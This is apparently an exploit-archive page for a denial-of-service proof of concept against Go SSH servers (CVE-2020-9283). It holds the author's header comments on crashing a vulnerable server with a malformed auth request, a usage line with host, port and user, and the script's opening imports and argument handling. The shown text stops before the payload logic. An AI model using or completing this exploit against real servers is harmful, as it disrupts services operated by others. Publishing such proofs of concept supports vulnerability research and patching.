Go ssh servers 0.0.2 denial of service (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-24 |
Type : dos |
Platform : linux
This exploit / vulnerability Go ssh servers 0.0.2 denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)
# Author: Mark Adams
# Date: 2020-02-21
# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py
# CVE: CVE-2020-9283
#
# Running this script may crash the remote SSH server if it is vulnerable.
# The GitHub repository contains a vulnerable and fixed SSH server for testing.
#
# $ python poc.py
# ./poc.py <host> <port> <user>
#
# $ python poc.py localhost 2022 root
# Malformed auth request sent. This should cause a panic on the remote server.
#
#!/usr/bin/env python
import socket
import sys
import paramiko
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST
if len(sys.argv) != 4:
print('./poc.py <host> <port> <user>')
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]